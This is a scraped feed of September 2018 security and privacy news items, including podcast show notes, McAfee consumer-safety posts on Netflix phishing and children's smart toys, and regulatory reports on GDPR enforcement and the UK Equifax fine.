In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by using a list of names to extract; however, over time, that list can be large and slow to use in matching. Using Cyobstract, analysts can input their lists of terms to match (such as a list of common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match directly to a name on a list.

The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).

The Cyobstract library can be downloaded from GitHub at

Google promises a fix for Chrome’s auto account-sign-in snafu, but you can stop it right now

Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, Chrome seems to automatically log you into the browser as well. Theoretically, that means that you will automatically begin sharing data with Google, like it or not.

The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like or Gmail, but not necessarily to Chrome. 

Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.

To read this article in full, please click here

Don’t Hit Me Up – Application Security Weekly #33

This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!


Full Show Notes:


Visit for all the latest episodes!


Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!


→Visit our website:

→Follow us on Twitter:

→Like us on Facebook:

Risky Business #515 — NSA staffer at centre of Kaspersky scandal jailed

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
  • Zoho has a very bad week
  • Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
  • Twitter API leaks DMs
  • Equifax fined by UK
  • Yubikey 5 enables passwordless Windows logins
  • Privacy International has an aneurism
  • NSS Labs launches antitrust suit against security software makers
  • MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She was the founder of Komand, which was a security automation and orchestration company but is now a part of Rapid7 as of about mid way through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
Twitter API bug leaked private data to other accounts
Equifax fined maximum penalty under 1998 UK data protection law
The Series 5 YubiKey Will Help Kill the Password | WIRED
Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
UK spooks fess up to snooping on Privacy International's private data
GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
NSS Labs files antitrust suit against multiple cybersecurity vendors
Hacking for ca$h | The Strategist
Operator of 'VirusTotal for criminals' gets 14-year prison sentence
Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
Snyk gets $22 million for platform that tracks security flaws in open source projects
They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
Microsoft Rolls Out Confidential Computing for Azure
Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
This Windows file may be secretly hoarding your passwords and emails | ZDNet
Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
Over 80 Cisco Products Affected by FragmentSmack DoS Bug
Cisco patches 'critical' credential bug in video surveillance software
Security Orchestration and Automation with InsightConnect | Rapid7
Security Orchestration and Automation for Security Operations | Rapid7

Netflix Users: Don’t Get Hooked by This Tricky Phishing Email

If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its owned content. So, it’s only natural cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, just discovered last week, fake Netflix emails have been circulating claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.

The headline in itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with a user’s account or that their account has been suspended. The email states that they need to update their account details in order to resolve the problem, but the link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are actually taken to the real Netflix home page, which gives this trick a sense of legitimacy.

In short – this phishing email scheme is convincing and tricky. That means it’s crucial all Netflix users take proactive steps now to protect themselves this stealthy attack. To do just that, follow these tips:

  • Be careful what you click on. Be sure to only click on emails that you are sure came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
  • Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re working with the real deal. You should be able to check their account status on the Netflix website, and determine the legitimacy of the request from there. If there’s still anything in question, feel free to call their support line and check about the notice that way as well.
  • Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

"metadata": {
"id": "8b4876aa-14b9-441d-a8b7-d62cc6a9e821",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "",
"author": "Gary Davis",
"author-page": "",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "",
"feedimageurl": "",
"pubDate": "Tue 25 Sept 2018 12:35:48 +0000"

The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.

Hack Naked News #190 – September 25, 2018

This week, WordPress sites backdoored with malicious code, Google's forced sign in to Chrome raises red flags, Newegg is victimized by Magecart Malware, a Woman hijacked CCTV cameras for Trump's inauguration, Bitcoin DDoS attacks, Cybercriminals target Kodi for Malware, and a Security Researcher is fined for hacking hotel Wifi. Jason Wood joins us for expert commentary on Google Chrome's "dark pattern" of poor privacy changes, on this episode of Hack Naked News!


Full Show Notes:


Visit for all the latest episodes!

Visit https://www.activecountermeasures/hnn to sign up for a demo or buy our AI Hunter!!


→Visit our website:

→Follow us on Twitter:

→Like us on Facebook:

Understanding Your Kid’s Smart Gadgets

When people think about IoT devices, many often think of those that fill their homes. Smart lights, ovens, TVs, etc. But there’s a whole other type of IoT devices that are inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they sometimes aren’t fully aware of how these devices can impact their child’s personal security. IoT has expanded to children, but it’s parents that need to understand how these toys affect their family, and what they can do to keep their children protected from an IoT-based cyberthreat.

Now, add IoT into the mix. The reason people are commonly adopting IoT devices is for one reason – convenience. And that’s the same reason these devices have gotten into children’s hands as well. They’re convenient, engaging, easy-to-use toys, some of which are even used to help educate kids.

But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded with these devices, which means their data could be potentially leveraged for malicious reasons if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.

Keeping connected kids safe  

Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.

Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.

To learn more about IoT devices and how your children use them, be sure to follow us at @McAfee and @McAfee_Home.

The post Understanding Your Kid’s Smart Gadgets appeared first on McAfee Blogs.

Double Shot – Business Security Weekly #100

This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid 7! In this two part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS Security, the best practices to understand how these systems work, holding accountability, and how legal and security share common goals!

Full Show Notes:


Visit for all the latest episodes!


Visit https://www.activecountermeasures/bsw to sign up for a demo or buy our AI Hunter!!


→Visit our website:

→Follow us on Twitter:

→Like us on Facebook:

Space Elevator Test

STAR space elevator
So cool!

STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, is comprised of two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.

Via Science News, “Japan has launched a miniature space elevator,” and “the STARS project.”

CNIL Publishes Initial Assessment of GDPR Implementation

On September 25, 2018, the French Data Protection Authority (the “CNIL”) published the first results of its factual assessment of the implementation of the EU General Data Protection Regulation (GDPR) in France and in Europe. When making this assessment, the CNIL first recalled the current status of the French legal framework, and provided key figures on the implementation of the GDPR from the perspective of privacy experts, private individuals and EU supervisory authorities. The CNIL then announced that it will adopt new GDPR tools in the near future. Read the full factual assessment (in French).

Upcoming Consolidation of the French Legal Framework

The French Data Protection Act (“the Act”) and its implementing Decree were amended by a law and Decree published respectively on June 21 and August 3, 2018, in order to bring French law in line with the GDPR and implement the EU Data Protection Directive for Police and Criminal Justice Authorities. However, some of the provisions of the Act still remain unchanged and are no longer applicable. In addition, the Act does not mention all new obligations imposed by the GDPR or the new rights of data subjects, and is therefore incomplete. The CNIL recalled that an ordinance is expected to be adopted by the end of this year to re-write the Act and facilitate readability of the French data protection framework.

Gradual Rolling Out of the GDPR by Privacy Experts

The CNIL noted that 24,500 organizations have appointed a data protection officer (“DPO”), which represents 13,000 DPOs. In comparison, only 5,000 DPOs were appointed under the previous data protection framework. Since May 25, 2018, the CNIL has also received approximately 7 data breach notifications a day, totaling more than 600 data breach notifications, which affected 15 million individuals. The CNIL  continues to receive a large number of authorization requests in the health sector (more than 100 requests filed since May 25, 2018, in particular for clinical trial purposes).

Individuals’ Unprecedented GDPR Awareness

Since May 25, 2018, the CNIL has received 3,767 complaints from individuals. This represents an increase of 64% compared to the number of complaints received during the same period in 2017, and can be explained by the widespread media coverage of the GDPR and cases such as Cambridge Analytica. EU supervisory authorities are currently handling more than 200 cross-border complaints under the cooperation procedure provided for by the GDPR, and the CNIL is a supervisory authority concerned for most of these cases.

Effective European Cooperation Under the GDPR

The CNIL recalled that a total of 18 GDPR guidelines have been adopted at the EU level and 7 guidelines are currently being drawn up by the European Data Protection Board (“EDPB”) (e.g., guidelines on the territorial scope of the GDPR, data transfers and video surveillance). Further, the IT platform chosen to support cooperation and consistency procedures under the GDPR has been effective since May 25, 2018. With respect to Data Protection Impact Assessments (“DPIAs”), the CNIL has submitted to the EDPB a list of processing operations requiring a DPIA. Once validated by the EDPB, this list and additional guidelines will be published by the CNIL.

Next Steps

In terms of the CNIL’s upcoming actions or initiatives, the CNIL announced that it will shortly propose the following new tools:

  • “Referentials” (i.e., guidelines) relating to the processing of personal data for HR and customer management purposes. These referentials are intended to update the CNIL’s well established doctrine in light of the new requirements of the GDPR. The draft referentials will be open for public consultation. Once finalized, the CNIL announced its intention to promote those referentials at the EU level.
  • A Model Regulation regarding biometric data. According to Article 9(4) of the GDPR, EU Member States may maintain and introduce further conditions, including limitations, with regard to the processing of biometric data. France introduced such conditions by amending the French Data Protection Act in order to allow the processing of biometric data for the purposes of controlling access to a company’s premises and/or devices and apps used by staff members to perform their job duties if that processing complies with the CNIL’s Model Regulation. Compliance with that Model Regulation constitutes an exception from the prohibition to process biometric data.
  • A first certification procedure. In May 2018, the CNIL launched a public consultation on the certification of the DPO, which ended on June 22, 2018. The CNIL will finalize the referentials relating to the certification of the DPO by the end of this month.
  • Compliance packs. The CNIL confirmed that it will continue to adopt compliance packs, (i.e., guidelines for a particular sector or industry).  The CNIL also announced its intention to promote some of these compliance packs at the EU level (such as the compliance pack on connected vehicles) in order to develop a common European doctrine that could be endorsed by the EDPB.
  • Codes of conduct. A dozen codes of conduct are currently being prepared, in particular codes of conduct on medical research and cloud infrastructures.
  • A massive open online course. This course will help participants familiarize themselves with the fundamental principles of the GDPR.

California transparency legislation could improve access to police records for journalists and the public

WikiMedia Commons

In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.

“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”

Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”

But all that Cruz’ family was allowed to know about her son’s death was that five officers were involved, and it took Smith over a year and a half to determine the name of the officer who killed Caesar Cruz.

While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.

In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.

Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.

“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.

If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, personnel records could be released to the public. Journalists would be able to more easily access information, like when officers shoot, kill, commit perjury, sexually assault, lie in an investigation, or seriously injure a citizen.

Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.

Despite opposition from police unions, Nikki Moore, legal counsel and legislative at California News Publishers Association, noted that the California Police Chiefs Association came on in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”

SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.

In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”

The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.

“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”

SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.

CCPA Amendment Bill Signed Into Law

On September 23, 2018, California Governor Jerry Brown signed into law SB-1121 (the “Bill”), which makes limited substantive and technical amendments to the California Consumer Privacy Act of 2018 (“CCPA”). The Bill takes effect immediately,  and delays the California Attorney General’s enforcement of the CCPA until six months after publication of the Attorney General’s implementing regulations, or July 1, 2020, whichever comes first. 

We have previously posted about the modest changes that SB-1121 makes to the CCPA. As reported in BNA Privacy Law Watch, the California legislature may consider broader substantive changes to the CCPA in 2019.

5 Simple But Powerful Career Tips

Getting ahead in your career doesn’t happen by accident. It requires planning and constant pursuit. That’s why working for a company that invests in you, truly wants you to succeed and enables you to grow personally and professionally makes a big difference in your career progression.

This week McAfee hosted our first-ever CMO Development Forum where our marketing and communications teams heard from leaders across the business, followed by breakout sessions for their own learning and development. As McAfee’s SVP and Chief Human Resources Officer, I was honored to speak to the team about my career journey and share lessons I learned along the way.

Whether you are just out the gate, or more experienced in your career, I hope my top five tips are helpful in your own career journey. Here’s what I shared:

1) Stay Hungry.

Whatever field or role you want to be in, the key thing is to be the best you can be and commit to staying the best. Understand your role, your industry and if you don’t know something, use everything at your disposal to figure it out. And once you’re an expert in your field – make sure you’re an expert in the business.

2) Celebrate Each Other’s Success.

There is enough room for everyone. I truly believe that. Maybe you missed out on a promotion, or a colleague was recognized and rewarded instead of you. Begrudging someone else’s success won’t get you anywhere. Instead, celebrate the success of others. Let’s lift each other up! And then use it as an opportunity to reflect or ask your leader what more you could have done. Find out what your development areas are to get you to the next level. Map out your future career path and show your manager you want it!

 3) Work Hard. Work Smart.

There’s no way around it – you have to work hard. But what distinguishes someone as a productive high-performer is when that person is working hard on the right things. You’ll find the task or project that has the biggest impact for your career and business is the one that requires the most focus. Start your day with those big, difficult jobs until you reach your goals. Relentlessly prioritize.

 4) Own Your Brand.

When someone says your name, what do they think? What values do they associate with you? Do people perceive you as self-centered or self-aware? Do they see you as a know-it-all or a fountain of knowledge? Are you a leader who motivates people or just a manager who pushes people too hard? These traits are all similar, but how they are perceived by others makes a huge difference. Know the value you bring to the table. And in everything that you do, make your values shines through.

5) Take Pride in Everything You Do.

Martin Luther King Jr. said, “If it falls to your lot to be a street sweeper, sweep streets like Michelangelo painted pictures, sweep streets like Beethoven composed music … Sweep streets so well that all the host of heaven and earth will have to pause and say: Here lived a great street sweeper who swept his job well.” This is one of my favorite quotes. No matter how big or small, take care in your work. Your work, your actions, represent you, so make sure you’re proud of your work.

Looking to join a company that invests in you? McAfee is hiring!

The post 5 Simple But Powerful Career Tips appeared first on McAfee Blogs.

ICO Issues First Enforcement Action Under the GDPR

The Information Commissioner’s Office (“ICO”) in the UK has issued the first formal enforcement action under the EU General Data Protection Regulation (GDPR) and the UK Data Protection Act 2018 (the “DPA”) on Canadian data analytics firm AggregateIQ Data Services Ltd. (“AIQ”). The enforcement action, in the form of an Enforcement Notice served under section 149 of the DPA, requires AIQ to “cease processing any personal data of UK or EU citizens obtained from UK political organizations or otherwise for the purposes of data analytics, political campaigning or any other advertising purposes.”

AIQ uses data to target online advertisements at voters, and its clients include UK political organizations, in particular Vote Leave, BeLeave, Veterans for Britain and the DUP Vote to Leave. These organizations provide personal data to AIQ for the purposes of targeting individuals with political advertising messages on social media.

While not established in the EU, the ICO has determined that as long as AIQ’s processing activities relate to the monitoring of data subjects’ behavior when that behavior takes place within the EU, then AIQ is subject to the GDPR, under its territorial scope provisions at Article 3(2)(b).

AIQ was found to be in breach of Articles 5(a) – 5(c) and Article 6 of the GDPR for processing personal data in a way that data subjects were not aware of, for a purpose they would not have expected, and without a lawful basis for processing. In addition, AIQ failed to provide the transparency information required under Article 14 of the GDPR.

AIQ is challenging the ICO’s decision and has exercised its right of appeal to the First-tier Tribunal, under section 162(1)(c) of DPA.

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If attacker can steal Bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems. There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If an attacker can hijack enough systems, mining in high volume can be profitable. Not only individuals struggle with protecting against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

5 Ways to Protect Your Finances Online

Financial companies continue to innovate with their online products and services, bringing conveniences for customers, but challenges when it comes to security.

This is because the current “fintech” (financial technology) landscape doesn’t just include traditional banks with online services. New players, like cryptocurrency sites, robo advisors and online loan providers have all joined the party. Regulations simply haven’t kept up, leaving security concerns up to the individual providers, and the consumers who use them.

To deal with issues like protecting customers’ data, privacy, and transactions, today’s fintech companies often use a patchwork of security software and tools. A recent survey found that many major financial service providers use between 100 and 200 disparate security solutions[1]. And these solutions rarely share threat intelligence. This can leave security teams overwhelmed, and customer information more vulnerable to data leaks and hacking.

In fact, research released earlier this year revealed that hackers are using “hidden tunnels” in the infrastructure used to transmit data between financial applications to conceal theft. This means that breaches could go weeks or months without detection, all while customer information is exposed.

Underscoring the problem, the financial services industry was recently named the most targeted sector for cyber attacks for the second year in a row. And, cyber attacks reported to the Financial Conduct Authority grew 80% in the last year.

This isn’t hard to believe given that last year seven of the U.K.’s largest banks, including Santander and HSBC, were forced to reduce operations or shut down systems all together after they were targeted in a coordinated denial of service (DoS) attack aimed at flooding servers with traffic.

Even though new regulations, like the European Union’s General Data Protection Regulation, are aimed at helping companies reduce security risks, and even fine them for privacy violations, there are still challenges when it comes to finding integrated solutions.

This means consumers have to be vigilant when it comes to protecting their money and information.

Here are 5 tips to protect your online finances:

  • Monitor your financial accounts & credit report—Regularly check your online bank statements and credit card accounts for any suspicious transactions.You’ll also want to review your credit scores once a quarter to make sure that no new accounts were opened in your name, without your permission. Check to see if your bank or credit card company offers free credit monitoring. You might also consider investing in an identity protection service, since these often include credit monitoring and will even reimburse you in the case of identity fraud or theft.
  • Use multi-layered security and alerts—Take advantage of advanced security tools if your providers offer them, such as multi-factor authentication. (Multi-factor means you provide two or more pieces of information to verify your identity before you can login to your account, such as typing a password and responding to a text message sent to your smartphone.)Also, many companies now offer free text or email alerts when a new charge is made, or when a change is made to any account information. Sign up for these to help monitor your accounts.
  • Do your homework—Before using a new financial service, make sure to research the Read other user’s reviews, and look into whether the company uses tools like encryption and multi-factor authentication to safeguard your data.
  • Don’t give away too much personal information—When we quickly sign up for accounts, sharing bank or identity information, we make it easy for the bad guys. Only share information that is absolutely necessary for the service you want to use.
  • Use comprehensive security—Just as fintech companies need to do their part, you have to do your part by using comprehensive security software.Make sure that all of your computers and devices are protected, including IoT devices. You may also want to look into new solutions that provide security at the network level.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

[1] Closing the Cybersecurity Gaps in Financial Services, a global survey from Ovum and sponsored by McAfee

"metadata": {
"id": "ba7ae803-1722-4e9f-98e7-8471653df0f5",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "",
"author": "Gary Davis",
"author-page": "",
"category": "Consumer Threat Notices",
"draft": "false",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"tinyimage": "",
"feedimageurl": "",
"pubDate": "Mon 24 Sept 2018 12:35:48 +0000"

The post 5 Ways to Protect Your Finances Online appeared first on McAfee Blogs.

UK ICO Fines Equifax for 2017 Breach

Recently, the UK Information Commissioner’s Office (“ICO”) fined credit rating agency Equifax £500,000 for failing to protect the personal data of up to 15 million UK individuals. The data was compromised during a cyber attack that occurred between May 13 and July 30, 2017, which affected 146 million customers globally. Although Equifax’s systems in the U.S. were targeted, the ICO found the credit agency’s UK arm, Equifax Ltd, failed to take appropriate steps to ensure that its parent firm, which processed this data on its behalf, had protected the information. The ICO investigation uncovered a number of serious contraventions of the UK Data Protection Act 1998 (the “DPA”), resulting in the ICO imposing on Equifax Ltd the maximum fine available.

The compromised UK data was controlled by Equifax Ltd and was processed by Equifax Ltd’s parent company and data processor, Equifax Inc. The breach affected Equifax’s Identity Verifer (“EIV”) dataset, which related to the EIV product, and its GCS dataset. The compromised data included names, telephone numbers, driver’s licence numbers, financial details, dates of birth, security questions and answers (in plain text), passwords (in plain text) and credit card numbers (obscured). The ICO investigation found that there had been breaches of five of the eight data protection principles of the DPA. In particular, the ICO commented in detail on Equifax’s breaches of the fifth and seventh principles and noted the following:

  • Personal data processed for any purpose or purposes shall not be kept for longer than is necessary for that purpose or those purposes (Fifth Principle):
    • In 2016, Equifax Ltd moved the EIV product from the U.S. to be hosted in the UK. Once the EIV product had been migrated to the UK, it was no longer necessary to keep any of the EIV dataset, in particular the compromised UK data, on Equifax Inc.’s systems. The EIV dataset, however, was not deleted from Equifax’s U.S. systems and was subsequently compromised.
    • With respect to the GCS datasets stored on the U.S. system, Equifax Ltd was not sufficiently aware of the purpose(s) for which it was being processed until after the breach. In the absence of a lawful basis for processing (in breach of the First Principle of the DPA), the personal data should have been deleted. The data was not deleted and Equifax Ltd failed to follow-up or check that all UK data had been removed from Equifax’s U.S. systems.
  • Appropriate technical and organizational measures shall be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data (Seventh Principle):
    • Equifax Ltd failed to undertake an adequate risk assessment of the security arrangements that Equifax Inc. had in place, prior to transferring data to Equifax Inc. or following the transfer.
    • Equifax Ltd and Equifax Inc. had various data processing agreements in place, however, these agreements failed to (1) provide appropriate safeguards (not limited to security requirements), and (2) properly incorporate the EU Standard Contractual Clauses (in breach of the Eighth Principle of the DPA).
    • Equifax Ltd had a clear contractual right to audit Equifax Inc.’s compliance with its obligations under the aforementioned data processing agreements. Despite this right, Equifax Ltd failed to exercise it to check Equifax Inc.’s compliance with its obligations.
    • Communication procedures between Equifax Ltd and Equifax Inc. were deemed inadequate. In particular, this was highlighted by the delay of over one month between Equifax Inc. becoming aware of the breach and Equifax Ltd being informed of it.
    • Equifax Ltd failed to ensure adequate security measures were in place or notice that Equifax Inc. had failed to take such measures, including:
      • failing to adequately encrypt personal data or protect user passwords. The ICO did not accept Equifax Ltd’s reasons (i.e., fraud prevention and password analysis) for storing passwords in a plaintext file, particularly as it was a direct breach of Equifax Ltd’s own Cryptology Standards, and the stated aims could be achieved by other more secure means;
      • failing to address known IT vulnerabilities, including those identified and reported to senior employees. In particular, Equifax had been warned about a critical vulnerability in its systems by the U.S. Department of Homeland Security in March 2017. This vulnerability was given a score of 10.0 on the Common Vulnerability Scoring System (“CVSS”). A CVSS score of 10.0 is the highest score, indicating a critical vulnerability that requires immediate attention. Equifax Inc. failed to patch all vulnerable systems and this vulnerability in its consumer-facing disputes portal was exploited by the cyber attack; and
      • not having fully up-to-date software, failing to undertake sufficient and regular system scans, and failing to ensure appropriate network segregation (some UK data was stored together with U.S. data, making it difficult to differentiate).

Since the breach occurred prior to May 25, 2018, it was dealt with in accordance the Act. While the Equifax fine represents the maximum available under the Act, the aggravating factors identified by the ICO including the number of affected data subjects, the type of data at risk, and the multiple, systematic and serious inadequacies, it is likely that this fine would have been considerably more had the EU General Data Protection Regulation been in force when the breach occurred.

Data Breaches: User Comprehension, Expectations, and Concerns with Handling Exposed Data

Data exposed by breaches persist as a security and privacy threat for Internet users. Despite this, best practices for how companies should respond to breaches, or how to responsibly handle data after it is leaked, have yet to be identified. We bring users into this discussion through two surveys. In the first, we examine the comprehension of 551 participants on the risks of data breaches and their sentiment towards potential remediation steps. In the second survey, we ask 10,212 participants to rate their level of comfort towards eight different scenarios that capture real world examples of security practitioners, researchers, journalists, and commercial entities investigating leaked data. Our findings indicate that users readily understand the risk of data breaches and have consistent expectations for technical and non-technical remediation steps. We also find that participants are comfortable with applications that examine leaked data—such as threat sharing or a “hacked or not” service when the application has a direct, tangible security benefit. Our findings help to inform a broader discussion on responsible uses of data exposed by breaches.

An Infinite Door – Paul’s Security Weekly #576

